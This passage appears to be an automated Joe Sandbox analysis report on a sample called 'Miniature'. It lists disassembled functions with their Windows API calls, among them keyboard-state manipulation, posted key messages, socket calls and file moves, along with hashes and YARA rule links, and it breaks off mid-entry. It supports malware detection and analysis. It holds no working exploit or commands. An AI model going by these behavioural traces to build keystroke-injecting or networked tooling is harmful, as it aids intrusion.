                                                                                                                                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2899b02b6ad84f6b351b5323572d4d8f056d6f3dbd505e7e9573d045c3c43534
                                                                                                                                                                                                                                                                                            • Instruction ID: 5bcd92669753bd5fec4e3683174d176c75fddf521a1532798c998a832f196095
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2899b02b6ad84f6b351b5323572d4d8f056d6f3dbd505e7e9573d045c3c43534
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A271A275E00215AFCB14DF68C845AAEBBF1EF4A328F108459E816EB351DB34EE41DB90
                                                                                                                                                                                                                                                                                            Function 00CA88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00CA8992
                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00CA899E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00CA8A79
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00CA8AAC
                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 00CA8AE4
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 00CA8B06
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CA8B1E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 64bb6f2134d774a45e532b92228f30fceb96320fe73ef95999389c29015b6c6c
                                                                                                                                                                                                                                                                                            • Instruction ID: eba1882c47c7e1f2c154d9d184138ecba285cca328dfa632f934c859b20da0f1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64bb6f2134d774a45e532b92228f30fceb96320fe73ef95999389c29015b6c6c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A719174600246AFDB259F65CC84FFABBB9FF0A308F140459F86557291CB31AE49EB11
                                                                                                                                                                                                                                                                                            Function 00C7B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C7B8C0
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7B8D5
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C7B936
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C7B964
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7B983
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C7B9C4
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C7B9E7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c6976de3345a7748263ec122264d8cc942957bc3fcd67a300d88ab8c6c91ff83
                                                                                                                                                                                                                                                                                            • Instruction ID: d24911b7c19512cc7c366903ba4cf91b7ffac06fc848f514bfd4588004e65695
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6976de3345a7748263ec122264d8cc942957bc3fcd67a300d88ab8c6c91ff83
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB51C1A06087D53EFB3652348855BBABEA95B06704F08C489F2ED468D2C3D8AEC4E751
                                                                                                                                                                                                                                                                                            Function 00C7B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 00C7B6E0
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7B6F5
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C7B756
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C7B782
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C7B79F
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C7B7DE
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C7B7FF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ac19a48d9e0abe0f0b54b84edca9e0b7582f7b90842cf5950215dfcb97afc3cc
                                                                                                                                                                                                                                                                                            • Instruction ID: 01fe53b92ce745be2e51aec323f522cc9d3e2393e4e62c73642536139f01d7d5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac19a48d9e0abe0f0b54b84edca9e0b7582f7b90842cf5950215dfcb97afc3cc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B551E3A09046D53EFB368274CC56B7ABEA95B46304F0CC489F1ED4A8D2D394EE84E761
                                                                                                                                                                                                                                                                                            Function 00C457A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00C45F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00C457E3
                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C4585E
                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C45879
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00C4589F
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,00C45F16,00000000,?,?,?,?,?,?,?,?,?,00C45F16,?), ref: 00C458BE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00C45F16,00000000,?,?,?,?,?,?,?,?,?,00C45F16,?), ref: 00C458F7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1bd64265d0cdc6b8ad99aae03056b61c4c984023cba3d458b217198bb2c950e7
                                                                                                                                                                                                                                                                                            • Instruction ID: 657a635ec3ad28411c84967f5c3886f361c82df7b8bb990277f8e2c6fa962808
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bd64265d0cdc6b8ad99aae03056b61c4c984023cba3d458b217198bb2c950e7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9851B771904649DFDB10CFA8D885BEEBBF8FF19320F14411AE956E7292D7309A41CB50
                                                                                                                                                                                                                                                                                            Function 00C33090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C330BB
                                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00C330C3
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C33151
                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00C3317C
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C331D1
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                            • Opcode ID: 67a8eafe7c1acf42b0ce91225c8c960c0cecf9074bac5c6381b07e67b4abc3c9
                                                                                                                                                                                                                                                                                            • Instruction ID: fbda3ce0075cbcb491d837acb5a6ac9927dcc7c489e9d2bd822309e9074fa583
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67a8eafe7c1acf42b0ce91225c8c960c0cecf9074bac5c6381b07e67b4abc3c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B241C334E202889BCF10DF68C885BAEBBB5AF44324F148155EC25AB392D735EB05CB91
                                                                                                                                                                                                                                                                                            Function 00C91B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C93AD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: _wcslen.LIBCMT ref: 00C93AF8
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C91B6F
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C91B7E
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C91C26
                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C91C56
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 95d171bba974fe5eb9b843f1705bc55420df68a69cf42350bd476746f70204d8
                                                                                                                                                                                                                                                                                            • Instruction ID: d772182c9c6620397401684dee921a7db613a2335e378210b092abd8b259e91e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95d171bba974fe5eb9b843f1705bc55420df68a69cf42350bd476746f70204d8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4241B671600115AFDB109F64C889BADB7E9EF45324F188059FC169B292D774EE81CBE1
                                                                                                                                                                                                                                                                                            Function 00C7D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7D7CD,?), ref: 00C7E714
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7D7CD,?), ref: 00C7E72D
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C7D7F0
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C7D82A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D8B0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D8C6
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00C7D90C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: d5b3ec44cf9d989a960fc487df091ec8f1f99972bb7b5f17561fd6ba785aafbf
                                                                                                                                                                                                                                                                                            • Instruction ID: fe6d81088b3b2a34ddfd3571934ff65de3b1b5a648b8862567ea1558afff2f71
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5b3ec44cf9d989a960fc487df091ec8f1f99972bb7b5f17561fd6ba785aafbf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F4199718052189EDF12EFA4D981FDD77B8AF08340F0040E6E50EEB181EB35A788DB51
                                                                                                                                                                                                                                                                                            Function 00CA3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00CA38B8
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA38EB
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA3920
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00CA3952
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00CA397C
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA398D
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA39A7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 844d8e2742313256e5807deb5edddfa0dac66fcc2104169a7ef6c617fd673775
                                                                                                                                                                                                                                                                                            • Instruction ID: d0524398a5ac442f1e6744deabe431129d619f873588aa665993276d67aae2e8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 844d8e2742313256e5807deb5edddfa0dac66fcc2104169a7ef6c617fd673775
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC315530644286AFDB21CF58DC94F6937A4FB8B318F1411A4F526CF2B2CB74AA44DB11
                                                                                                                                                                                                                                                                                            Function 00C7808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C780D0
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C780F6
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C780F9
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C78117
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C78120
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C78145
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C78153
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                            • Opcode ID: fe2250657effe7f0e0ac2e8182985a2419fcefabcd0a06127d50bd02aae1a1cf
                                                                                                                                                                                                                                                                                            • Instruction ID: 94fca487ee5107cd697be25c483b858fd54f48be4b8dec25fd6c6aecb2602f46
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe2250657effe7f0e0ac2e8182985a2419fcefabcd0a06127d50bd02aae1a1cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA218372600219AF9F10DFA8CC88DFE77ACEB093647448425FA1ADB290DA70DD4A8760
                                                                                                                                                                                                                                                                                            Function 00C78164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C781A9
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C781CF
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C781D2
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 00C781F3
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 00C781FC
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C78216
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C78224
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 663c0a080f8acfcf5a3fa440402af1bd2e1fb8848e247af6f27e4e6f69d31f4a
                                                                                                                                                                                                                                                                                            • Instruction ID: 257c904908c475099e7f434cac22298cbb9a14289af16b9b5b86324140cb3f00
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 663c0a080f8acfcf5a3fa440402af1bd2e1fb8848e247af6f27e4e6f69d31f4a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A217471600104BF9B109BB9DC89EEE77ECEB09365744C125FA1ACB1A1DA70ED45C764
                                                                                                                                                                                                                                                                                            Function 00C80E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
